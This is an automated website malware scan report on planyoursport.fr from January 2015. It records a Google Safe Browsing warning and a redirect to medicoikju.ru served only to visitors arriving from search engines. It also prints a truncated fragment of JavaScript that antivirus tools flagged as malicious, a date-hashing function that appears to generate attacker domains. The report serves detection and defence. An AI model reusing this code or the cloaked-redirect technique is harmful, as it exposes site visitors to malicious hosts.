Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=planyoursport.fr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://planyoursport.fr/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: planyoursport.fr Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 09 Jan 2015 10:35:38 GMT Location: http://medicoikju.ru/ Server: Apache Vary: Accept-Encoding Content-Length: 229 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: mailplanBAK=R2555566638; path=/; expires=Fri, 09-Jan-2015 11:55:45 GMT Set-Cookie: mailplan=R3631169419; path=/; expires=Fri, 09-Jan-2015 11:54:51 GMT | malicious |
Scanned pages/files
Request | Server response | Status |
http://planyoursport.fr/ | 200 OK Content-Length: 12817 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,3 Antivirus reports: | ||
http://planyoursport.fr/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 09 Jan 2015 10:35:39 GMT Location: http://medicoikju.ru/ Server: Apache Vary: Accept-Encoding Content-Length: 205 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: mailplanBAK=R2555570994; path=/; expires=Fri, 09-Jan-2015 11:39:33 GMT Set-Cookie: mailplan=R3631169419; path=/; expires=Fri, 09-Jan-2015 11:38:26 GMT | clean |
http://medicoikju.ru/ | 500 Can't connect to medicoikju.ru:80 Content-Length: 188 Content-Type: text/plain | clean |
http://medicoikju.ru/test404page.js | 500 Can't connect to medicoikju.ru:80 Content-Length: 188 Content-Type: text/plain | clean |